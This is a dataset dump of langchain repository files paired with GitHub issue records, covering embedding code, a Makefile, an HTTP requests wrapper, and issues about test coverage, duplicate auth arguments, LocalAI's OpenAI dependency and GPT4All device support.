disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
if self.show_progress_bar:
try:
from tqdm.auto import tqdm
_iter = tqdm(range(0, len(tokens), _chunk_size))
except ImportError:
_iter = range(0, len(tokens), _chunk_size)
else:
_iter = range(0, len(tokens), _chunk_size)
for i in _iter:
response = embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
if self.skip_empty and len(batched_embeddings[i]) == 1:
continue
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average = embed_with_retry(
self,
input="",
**self._invocation_params,
)[
"data"
][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
# please refer to
# https://github.com/openai/openai-cookbook/blob/main/examples/Embedding_long_inputs.ipynb
async def _aget_len_safe_embeddings(
self, texts: List[str], *, engine: str, chunk_size: Optional[int] = None
) -> List[List[float]]:
embeddings: List[List[float]] = [[] for _ in range(len(texts))]
try:
import tiktoken
except ImportError:
raise ImportError(
"Could not import tiktoken python package. "
"This is needed in order to for OpenAIEmbeddings. "
"Please install it with `pip install tiktoken`."
)
tokens = []
indices = []
model_name = self.tiktoken_model_name or self.model
try:
encoding = tiktoken.encoding_for_model(model_name)
except KeyError:
logger.warning("Warning: model not found. Using cl100k_base encoding.")
model = "cl100k_base"
encoding = tiktoken.get_encoding(model)
for i, text in enumerate(texts):
if self.model.endswith("001"):
# See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
# replace newlines, which can negatively affect performance.
text = text.replace("\n", " ")
token = encoding.encode(
text,
allowed_special=self.allowed_special,
disallowed_special=self.disallowed_special,
)
for j in range(0, len(token), self.embedding_ctx_length):
tokens.append(token[j : j + self.embedding_ctx_length])
indices.append(i)
batched_embeddings: List[List[float]] = []
_chunk_size = chunk_size or self.chunk_size
for i in range(0, len(tokens), _chunk_size):
response = await async_embed_with_retry(
self,
input=tokens[i : i + _chunk_size],
**self._invocation_params,
)
batched_embeddings.extend(r["embedding"] for r in response["data"])
results: List[List[List[float]]] = [[] for _ in range(len(texts))]
num_tokens_in_batch: List[List[int]] = [[] for _ in range(len(texts))]
for i in range(len(indices)):
results[indices[i]].append(batched_embeddings[i])
num_tokens_in_batch[indices[i]].append(len(tokens[i]))
for i in range(len(texts)):
_result = results[i]
if len(_result) == 0:
average = (
await async_embed_with_retry(
self,
input="",
**self._invocation_params,
)
)["data"][0]["embedding"]
else:
average = np.average(_result, axis=0, weights=num_tokens_in_batch[i])
embeddings[i] = (average / np.linalg.norm(average)).tolist()
return embeddings
def embed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
# NOTE: to keep things simple, we assume the list may contain texts longer
# than the maximum context and use length-safe embedding function.
return self._get_len_safe_embeddings(texts, engine=self.deployment)
async def aembed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to OpenAI's embedding endpoint async for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
# NOTE: to keep things simple, we assume the list may contain texts longer
# than the maximum context and use length-safe embedding function.
return await self._aget_len_safe_embeddings(texts, engine=self.deployment)
def embed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
return self.embed_documents([text])[0]
async def aembed_query(self, text: str) -> List[float]:
"""Call out to OpenAI's embedding endpoint async for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embeddings = await self.aembed_documents([text])
return embeddings[0]
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,941 | Issue: `make coverage` doesn't work locally | ### Issue you'd like to raise.
When I set up the local environment and try to run `make coverage`, I get this error:
```bash
; make coverage
poetry run pytest --cov \
--cov-config=.coveragerc \
--cov-report xml \
--cov-report term-missing:skip-covered
================================================================================================================ test session starts ================================================================================================================
platform darwin -- Python 3.9.17, pytest-7.4.0, pluggy-1.2.0
rootdir: /Users/cjameson/workspace/cjcjameson/langchain/libs/langchain
configfile: pyproject.toml
plugins: asyncio-0.20.3, cov-4.1.0, vcr-1.0.2, syrupy-4.2.1, mock-3.11.1, anyio-3.7.1, dotenv-0.5.2, socket-0.6.0
asyncio: mode=strict
collected 2832 items / 1 error / 4 skipped
INTERNALERROR> Traceback (most recent call last):
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/config/__init__.py", line 1611, in getoption
INTERNALERROR> val = getattr(self.option, name)
INTERNALERROR> AttributeError: 'Namespace' object has no attribute 'only_extended'
INTERNALERROR>
INTERNALERROR> The above exception was the direct cause of the following exception:
INTERNALERROR>
INTERNALERROR> Traceback (most recent call last):
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 270, in wrap_session
INTERNALERROR> session.exitstatus = doit(config, session) or 0
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 323, in _main
INTERNALERROR> config.hook.pytest_collection(session=session)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_hooks.py", line 433, in __call__
INTERNALERROR> return self._hookexec(self.name, self._hookimpls, kwargs, firstresult)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_manager.py", line 112, in _hookexec
INTERNALERROR> return self._inner_hookexec(hook_name, methods, kwargs, firstresult)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 155, in _multicall
INTERNALERROR> return outcome.get_result()
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_result.py", line 108, in get_result
INTERNALERROR> raise exc.with_traceback(exc.__traceback__)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 80, in _multicall
INTERNALERROR> res = hook_impl.function(*args)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 334, in pytest_collection
INTERNALERROR> session.perform_collect()
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/main.py", line 672, in perform_collect
INTERNALERROR> hook.pytest_collection_modifyitems(
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_hooks.py", line 433, in __call__
INTERNALERROR> return self._hookexec(self.name, self._hookimpls, kwargs, firstresult)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_manager.py", line 112, in _hookexec
INTERNALERROR> return self._inner_hookexec(hook_name, methods, kwargs, firstresult)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 155, in _multicall
INTERNALERROR> return outcome.get_result()
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_result.py", line 108, in get_result
INTERNALERROR> raise exc.with_traceback(exc.__traceback__)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/pluggy/_callers.py", line 80, in _multicall
INTERNALERROR> res = hook_impl.function(*args)
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/libs/langchain/tests/unit_tests/conftest.py", line 43, in pytest_collection_modifyitems
INTERNALERROR> only_extended = config.getoption("--only-extended") or False
INTERNALERROR> File "/Users/cjameson/workspace/cjcjameson/langchain/venv/lib/python3.9/site-packages/_pytest/config/__init__.py", line 1622, in getoption
INTERNALERROR> raise ValueError(f"no option named {name!r}") from e
INTERNALERROR> ValueError: no option named 'only_extended'
====================================================================================================== 4 skipped, 1 warning, 1 error in 3.80s =======================================================================================================
make: *** [coverage] Error 3
```
### Suggestion:
It looks like the `pytest_addoption` in `tests/unit_tests/conftest.py` is not being found.
This stack-overflow attributes it to pytest not being able to find `conftest.py` files in nested directories. https://stackoverflow.com/a/31526934
The recommendations to create a plugin or move the conftest.py files don't seem palatable, but let me know if maybe that's the thing to do
Given the re-organization into `libs/langchain`, that could have messed up pytest local development.
I'm curious if/how it works in CI ... | https://github.com/langchain-ai/langchain/issues/10941 | https://github.com/langchain-ai/langchain/pull/10974 | 040d436b3f0ba21028850de34dc7780cf4700e46 | 05d5fcfdf89abea0993998689fb8e9a8133b7276 | "2023-09-22T15:58:24Z" | python | "2023-09-23T23:03:53Z" | libs/langchain/Makefile | .PHONY: all clean docs_build docs_clean docs_linkcheck api_docs_build api_docs_clean api_docs_linkcheck format lint test tests test_watch integration_tests docker_tests help extended_tests
# Default target executed when no arguments are given to make.
all: help
######################
# TESTING AND COVERAGE
######################
# Run unit tests and generate a coverage report.
coverage:
poetry run pytest --cov \
--cov-config=.coveragerc \
--cov-report xml \
--cov-report term-missing:skip-covered
# Define a variable for the test file path.
TEST_FILE ?= tests/unit_tests/
test:
poetry run pytest --disable-socket --allow-unix-socket $(TEST_FILE)
tests:
poetry run pytest --disable-socket --allow-unix-socket $(TEST_FILE)
extended_tests:
poetry run pytest --disable-socket --allow-unix-socket --only-extended tests/unit_tests
test_watch:
poetry run ptw --now . -- tests/unit_tests
integration_tests:
poetry run pytest tests/integration_tests
scheduled_tests:
poetry run pytest -m scheduled tests/integration_tests
docker_tests:
docker build -t my-langchain-image:test .
docker run --rm my-langchain-image:test
######################
# LINTING AND FORMATTING
######################
# Define a variable for Python and notebook files.
PYTHON_FILES=.
lint format: PYTHON_FILES=.
lint_diff format_diff: PYTHON_FILES=$(shell git diff --relative=libs/langchain --name-only --diff-filter=d master | grep -E '\.py$$|\.ipynb$$')
lint lint_diff:
./scripts/check_pydantic.sh .
./scripts/check_imports.sh
poetry run ruff .
poetry run black $(PYTHON_FILES) --check
poetry run mypy $(PYTHON_FILES)
format format_diff:
poetry run black $(PYTHON_FILES)
poetry run ruff --select I --fix $(PYTHON_FILES)
spell_check:
poetry run codespell --toml pyproject.toml
spell_fix:
poetry run codespell --toml pyproject.toml -w
######################
# HELP
######################
help:
@echo '===================='
@echo 'clean - run docs_clean and api_docs_clean'
@echo 'docs_build - build the documentation'
@echo 'docs_clean - clean the documentation build artifacts'
@echo 'docs_linkcheck - run linkchecker on the documentation'
@echo 'api_docs_build - build the API Reference documentation'
@echo 'api_docs_clean - clean the API Reference documentation build artifacts'
@echo 'api_docs_linkcheck - run linkchecker on the API Reference documentation'
@echo '-- LINTING --'
@echo 'format - run code formatters'
@echo 'lint - run linters'
@echo 'spell_check - run codespell on the project'
@echo 'spell_fix - run codespell on the project and fix the errors'
@echo '-- TESTS --'
@echo 'coverage - run unit tests and generate coverage report'
@echo 'test - run unit tests'
@echo 'tests - run unit tests (alias for "make test")'
@echo 'test TEST_FILE=<test_file> - run all tests in file'
@echo 'extended_tests - run only extended unit tests'
@echo 'test_watch - run unit tests in watch mode'
@echo 'integration_tests - run integration tests'
@echo 'docker_tests - run unit tests in docker'
@echo '-- DOCUMENTATION tasks are from the top-level Makefile --'
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 8,842 | TypeError Due to Duplicate 'auth' Argument in aiohttp Request when provide header to APIChain | ### System Info
Langchain version: 0.0.253
Python:3.11
### Who can help?
@agola11 @hwchase17 @eyurtsev
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [ ] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [X] Chains
- [ ] Callbacks/Tracing
- [X] Async
### Reproduction
1. Environment Setup:
Ensure you're using Python 3.11.
Install the necessary libraries and dependencies:
```bash
pip install fastapi uvicorn aiohttp langchai
```
2. APIChain Initialization:
Set up the APIChain utility using the provided API documentation and the chosen language model:
```python
from langchain import APIChain
chain = APIChain.from_llm_and_api_docs(api_docs=openapi.MY_API_DOCS, llm=choosen_llm, verbose=True, headers=headers)
```
3. Run the FastAPI application:
Use a tool like Uvicorn to start your FastAPI app:
```lua
uvicorn your_app_name:app --reload
```
4. Trigger the API Endpoint:
Make a request to the FastAPI endpoint that uses the APIChain utility. This could be through tools like curl, Postman, or directly from a browser, depending on how your API is set up.
Execute the Callback:
Inside the relevant endpoint, ensure you have the following snippet:
```python
with get_openai_callback() as cb:
response = await chain.arun(user_query)
```
5. Observe the Error:
You should encounter a TypeError indicating a conflict with the auth argument in the aiohttp.client.ClientSession.request() method. Because of providing header to APIChain and running it with ```arun``` method.
### Expected behavior
Request Execution:
The chain.arun(user_query) method should interact with the intended external service or API without any issues.
The auth parameter, when used in the underlying request to the external service (in aiohttp), should be correctly applied without conflicts or multiple definitions. | https://github.com/langchain-ai/langchain/issues/8842 | https://github.com/langchain-ai/langchain/pull/11010 | 88a02076affa2accd0465ee5ea9848b68d0e812b | 956ee981c03874d6e413a51eed9f7b437e52f07c | "2023-08-06T23:55:31Z" | python | "2023-09-25T14:45:04Z" | libs/langchain/langchain/utilities/requests.py | """Lightweight wrapper around requests library, with async support."""
from contextlib import asynccontextmanager
from typing import Any, AsyncGenerator, Dict, Optional
import aiohttp
import requests
from langchain.pydantic_v1 import BaseModel, Extra
class Requests(BaseModel):
"""Wrapper around requests to handle auth and async.
The main purpose of this wrapper is to handle authentication (by saving
headers) and enable easy async methods on the same base object.
"""
headers: Optional[Dict[str, str]] = None
aiosession: Optional[aiohttp.ClientSession] = None
auth: Optional[Any] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
def get(self, url: str, **kwargs: Any) -> requests.Response:
"""GET the URL and return the text."""
return requests.get(url, headers=self.headers, auth=self.auth, **kwargs)
def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""POST to the URL and return the text."""
return requests.post(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""PATCH the URL and return the text."""
return requests.patch(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> requests.Response:
"""PUT the URL and return the text."""
return requests.put(
url, json=data, headers=self.headers, auth=self.auth, **kwargs
)
def delete(self, url: str, **kwargs: Any) -> requests.Response:
"""DELETE the URL and return the text."""
return requests.delete(url, headers=self.headers, auth=self.auth, **kwargs)
@asynccontextmanager
async def _arequest(
self, method: str, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""Make an async request."""
if not self.aiosession:
async with aiohttp.ClientSession() as session:
async with session.request(
method, url, headers=self.headers, auth=self.auth, **kwargs
) as response:
yield response
else:
async with self.aiosession.request(
method, url, headers=self.headers, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def aget(
self, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""GET the URL and return the text asynchronously."""
async with self._arequest("GET", url, auth=self.auth, **kwargs) as response:
yield response
@asynccontextmanager
async def apost(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""POST to the URL and return the text asynchronously."""
async with self._arequest(
"POST", url, json=data, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def apatch(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""PATCH the URL and return the text asynchronously."""
async with self._arequest(
"PATCH", url, json=data, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def aput(
self, url: str, data: Dict[str, Any], **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""PUT the URL and return the text asynchronously."""
async with self._arequest(
"PUT", url, json=data, auth=self.auth, **kwargs
) as response:
yield response
@asynccontextmanager
async def adelete(
self, url: str, **kwargs: Any
) -> AsyncGenerator[aiohttp.ClientResponse, None]:
"""DELETE the URL and return the text asynchronously."""
async with self._arequest("DELETE", url, auth=self.auth, **kwargs) as response:
yield response
class TextRequestsWrapper(BaseModel):
"""Lightweight wrapper around requests library.
The main purpose of this wrapper is to always return a text output.
"""
headers: Optional[Dict[str, str]] = None
aiosession: Optional[aiohttp.ClientSession] = None
auth: Optional[Any] = None
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
arbitrary_types_allowed = True
@property
def requests(self) -> Requests:
return Requests(
headers=self.headers, aiosession=self.aiosession, auth=self.auth
)
def get(self, url: str, **kwargs: Any) -> str:
"""GET the URL and return the text."""
return self.requests.get(url, **kwargs).text
def post(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""POST to the URL and return the text."""
return self.requests.post(url, data, **kwargs).text
def patch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PATCH the URL and return the text."""
return self.requests.patch(url, data, **kwargs).text
def put(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PUT the URL and return the text."""
return self.requests.put(url, data, **kwargs).text
def delete(self, url: str, **kwargs: Any) -> str:
"""DELETE the URL and return the text."""
return self.requests.delete(url, **kwargs).text
async def aget(self, url: str, **kwargs: Any) -> str:
"""GET the URL and return the text asynchronously."""
async with self.requests.aget(url, **kwargs) as response:
return await response.text()
async def apost(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""POST to the URL and return the text asynchronously."""
async with self.requests.apost(url, data, **kwargs) as response:
return await response.text()
async def apatch(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PATCH the URL and return the text asynchronously."""
async with self.requests.apatch(url, data, **kwargs) as response:
return await response.text()
async def aput(self, url: str, data: Dict[str, Any], **kwargs: Any) -> str:
"""PUT the URL and return the text asynchronously."""
async with self.requests.aput(url, data, **kwargs) as response:
return await response.text()
async def adelete(self, url: str, **kwargs: Any) -> str:
"""DELETE the URL and return the text asynchronously."""
async with self.requests.adelete(url, **kwargs) as response:
return await response.text()
# For backwards compatibility
RequestsWrapper = TextRequestsWrapper
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,912 | LocalAI embeddings shouldn't require OpenAI | ### System Info
macOS Ventura 13.5.2, M1
### Who can help?
@mudler
### Information
- [ ] The official example notebooks/scripts
- [ ] My own modified scripts
### Related Components
- [ ] LLMs/Chat Models
- [X] Embedding Models
- [ ] Prompts / Prompt Templates / Prompt Selectors
- [ ] Output Parsers
- [ ] Document Loaders
- [ ] Vector Stores / Retrievers
- [ ] Memory
- [ ] Agents / Agent Executors
- [ ] Tools / Toolkits
- [ ] Chains
- [ ] Callbacks/Tracing
- [ ] Async
### Reproduction
https://github.com/langchain-ai/langchain/blob/v0.0.298/libs/langchain/langchain/embeddings/localai.py#L197
### Expected behavior
Why does LocalAI embeddings require OpenAI? I think LocalAI's embeddings has no need for OpenAI, it has a whole embeddings suite: https://localai.io/features/embeddings/
I think it should be directly usable with its [`/embeddings` endpoint](https://github.com/go-skynet/LocalAI/blob/v1.25.0/api/api.go#L190) | https://github.com/langchain-ai/langchain/issues/10912 | https://github.com/langchain-ai/langchain/pull/10946 | 2c114fcb5ecc0a9e75e8acb63d9dd5b4a6ced9a9 | b11f21c25fc6accca7a6f325c1fd3e63dd5f91ea | "2023-09-22T00:17:24Z" | python | "2023-09-29T02:56:42Z" | libs/langchain/langchain/embeddings/localai.py | from __future__ import annotations
import logging
import warnings
from typing import (
Any,
Callable,
Dict,
List,
Literal,
Optional,
Sequence,
Set,
Tuple,
Union,
)
from tenacity import (
AsyncRetrying,
before_sleep_log,
retry,
retry_if_exception_type,
stop_after_attempt,
wait_exponential,
)
from langchain.pydantic_v1 import BaseModel, Extra, Field, root_validator
from langchain.schema.embeddings import Embeddings
from langchain.utils import get_from_dict_or_env, get_pydantic_field_names
logger = logging.getLogger(__name__)
def _create_retry_decorator(embeddings: LocalAIEmbeddings) -> Callable[[Any], Any]:
import openai
min_seconds = 4
max_seconds = 10
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
return retry(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def _async_retry_decorator(embeddings: LocalAIEmbeddings) -> Any:
import openai
min_seconds = 4
max_seconds = 10
# Wait 2^x * 1 second between each retry starting with
# 4 seconds, then up to 10 seconds, then 10 seconds afterwards
async_retrying = AsyncRetrying(
reraise=True,
stop=stop_after_attempt(embeddings.max_retries),
wait=wait_exponential(multiplier=1, min=min_seconds, max=max_seconds),
retry=(
retry_if_exception_type(openai.error.Timeout)
| retry_if_exception_type(openai.error.APIError)
| retry_if_exception_type(openai.error.APIConnectionError)
| retry_if_exception_type(openai.error.RateLimitError)
| retry_if_exception_type(openai.error.ServiceUnavailableError)
),
before_sleep=before_sleep_log(logger, logging.WARNING),
)
def wrap(func: Callable) -> Callable:
async def wrapped_f(*args: Any, **kwargs: Any) -> Callable:
async for _ in async_retrying:
return await func(*args, **kwargs)
raise AssertionError("this is unreachable")
return wrapped_f
return wrap
# https://stackoverflow.com/questions/76469415/getting-embeddings-of-length-1-from-langchain-openaiembeddings
def _check_response(response: dict) -> dict:
if any(len(d["embedding"]) == 1 for d in response["data"]):
import openai
raise openai.error.APIError("LocalAI API returned an empty embedding")
return response
def embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
retry_decorator = _create_retry_decorator(embeddings)
@retry_decorator
def _embed_with_retry(**kwargs: Any) -> Any:
response = embeddings.client.create(**kwargs)
return _check_response(response)
return _embed_with_retry(**kwargs)
async def async_embed_with_retry(embeddings: LocalAIEmbeddings, **kwargs: Any) -> Any:
"""Use tenacity to retry the embedding call."""
@_async_retry_decorator(embeddings)
async def _async_embed_with_retry(**kwargs: Any) -> Any:
response = await embeddings.client.acreate(**kwargs)
return _check_response(response)
return await _async_embed_with_retry(**kwargs)
class LocalAIEmbeddings(BaseModel, Embeddings):
"""LocalAI embedding models.
To use, you should have the ``openai`` python package installed, and the
environment variable ``OPENAI_API_KEY`` set to a random string. You need to
specify ``OPENAI_API_BASE`` to point to your LocalAI service endpoint.
Example:
.. code-block:: python
from langchain.embeddings import LocalAIEmbeddings
openai = LocalAIEmbeddings(
openai_api_key="random-key",
openai_api_base="http://localhost:8080"
)
"""
client: Any #: :meta private:
model: str = "text-embedding-ada-002"
deployment: str = model
openai_api_version: Optional[str] = None
openai_api_base: Optional[str] = None
# to support explicit proxy for LocalAI
openai_proxy: Optional[str] = None
embedding_ctx_length: int = 8191
"""The maximum number of tokens to embed at once."""
openai_api_key: Optional[str] = None
openai_organization: Optional[str] = None
allowed_special: Union[Literal["all"], Set[str]] = set()
disallowed_special: Union[Literal["all"], Set[str], Sequence[str]] = "all"
chunk_size: int = 1000
"""Maximum number of texts to embed in each batch"""
max_retries: int = 6
"""Maximum number of retries to make when generating."""
request_timeout: Optional[Union[float, Tuple[float, float]]] = None
"""Timeout in seconds for the LocalAI request."""
headers: Any = None
show_progress_bar: bool = False
"""Whether to show a progress bar when embedding."""
model_kwargs: Dict[str, Any] = Field(default_factory=dict)
"""Holds any model parameters valid for `create` call not explicitly specified."""
class Config:
"""Configuration for this pydantic object."""
extra = Extra.forbid
@root_validator(pre=True)
def build_extra(cls, values: Dict[str, Any]) -> Dict[str, Any]:
"""Build extra kwargs from additional params that were passed in."""
all_required_field_names = get_pydantic_field_names(cls)
extra = values.get("model_kwargs", {})
for field_name in list(values):
if field_name in extra:
raise ValueError(f"Found {field_name} supplied twice.")
if field_name not in all_required_field_names:
warnings.warn(
f"""WARNING! {field_name} is not default parameter.
{field_name} was transferred to model_kwargs.
Please confirm that {field_name} is what you intended."""
)
extra[field_name] = values.pop(field_name)
invalid_model_kwargs = all_required_field_names.intersection(extra.keys())
if invalid_model_kwargs:
raise ValueError(
f"Parameters {invalid_model_kwargs} should be specified explicitly. "
f"Instead they were passed in as part of `model_kwargs` parameter."
)
values["model_kwargs"] = extra
return values
@root_validator()
def validate_environment(cls, values: Dict) -> Dict:
"""Validate that api key and python package exists in environment."""
values["openai_api_key"] = get_from_dict_or_env(
values, "openai_api_key", "OPENAI_API_KEY"
)
values["openai_api_base"] = get_from_dict_or_env(
values,
"openai_api_base",
"OPENAI_API_BASE",
default="",
)
values["openai_proxy"] = get_from_dict_or_env(
values,
"openai_proxy",
"OPENAI_PROXY",
default="",
)
default_api_version = ""
values["openai_api_version"] = get_from_dict_or_env(
values,
"openai_api_version",
"OPENAI_API_VERSION",
default=default_api_version,
)
values["openai_organization"] = get_from_dict_or_env(
values,
"openai_organization",
"OPENAI_ORGANIZATION",
default="",
)
try:
import openai
values["client"] = openai.Embedding
except ImportError:
raise ImportError(
"Could not import openai python package. "
"Please install it with `pip install openai`."
)
return values
@property
def _invocation_params(self) -> Dict:
openai_args = {
"model": self.model,
"request_timeout": self.request_timeout,
"headers": self.headers,
"api_key": self.openai_api_key,
"organization": self.openai_organization,
"api_base": self.openai_api_base,
"api_version": self.openai_api_version,
**self.model_kwargs,
}
if self.openai_proxy:
import openai
openai.proxy = {
"http": self.openai_proxy,
"https": self.openai_proxy,
} # type: ignore[assignment] # noqa: E501
return openai_args
def _embedding_func(self, text: str, *, engine: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint."""
# handle large input text
if self.model.endswith("001"):
# See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
# replace newlines, which can negatively affect performance.
text = text.replace("\n", " ")
return embed_with_retry(
self,
input=[text],
**self._invocation_params,
)["data"][
0
]["embedding"]
async def _aembedding_func(self, text: str, *, engine: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint."""
# handle large input text
if self.model.endswith("001"):
# See: https://github.com/openai/openai-python/issues/418#issuecomment-1525939500
# replace newlines, which can negatively affect performance.
text = text.replace("\n", " ")
return (
await async_embed_with_retry(
self,
input=[text],
**self._invocation_params,
)
)["data"][0]["embedding"]
def embed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to LocalAI's embedding endpoint for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
# call _embedding_func for each text
return [self._embedding_func(text, engine=self.deployment) for text in texts]
async def aembed_documents(
self, texts: List[str], chunk_size: Optional[int] = 0
) -> List[List[float]]:
"""Call out to LocalAI's embedding endpoint async for embedding search docs.
Args:
texts: The list of texts to embed.
chunk_size: The chunk size of embeddings. If None, will use the chunk size
specified by the class.
Returns:
List of embeddings, one for each text.
"""
embeddings = []
for text in texts:
response = await self._aembedding_func(text, engine=self.deployment)
embeddings.append(response)
return embeddings
def embed_query(self, text: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embedding = self._embedding_func(text, engine=self.deployment)
return embedding
async def aembed_query(self, text: str) -> List[float]:
"""Call out to LocalAI's embedding endpoint async for embedding query text.
Args:
text: The text to embed.
Returns:
Embedding for the text.
"""
embedding = await self._aembedding_func(text, engine=self.deployment)
return embedding
|
closed | langchain-ai/langchain | https://github.com/langchain-ai/langchain | 10,486 | Add device to GPT4All | ### Feature request
Hey guys!
Thanks for the great tool you've developed.
LLama now supports device and so is GPT4All:
https://docs.gpt4all.io/gpt4all_python.html#gpt4all.gpt4all.GPT4All.__init__
Can you guys please add the device property to the file: "langchain/llms/gpt4all.py"
LN 96:
`
device: Optional[str] = Field("cpu", alias="device")
"""Device name: cpu, gpu, nvidia, intel, amd or DeviceName."""
`
Model Init:
`
values["client"] = GPT4AllModel(
model_name,
model_path=model_path or None,
model_type=values["backend"],
allow_download=values["allow_download"],
device=values["device"]
)
`
### Motivation
Necessity to use the device on GPU powered machines.
### Your contribution
None.. :( | https://github.com/langchain-ai/langchain/issues/10486 | https://github.com/langchain-ai/langchain/pull/11216 | 92683262f4a6c2db95c3aad40a6f6dfde2df43d1 | c6d7124675902e3a2628559d8a2b22c30747f75d | "2023-09-12T09:02:19Z" | python | "2023-10-04T00:37:30Z" | libs/langchain/langchain/llms/gpt4all.py | from functools import partial
from typing import Any, Dict, List, Mapping, Optional, Set
from langchain.callbacks.manager import CallbackManagerForLLMRun
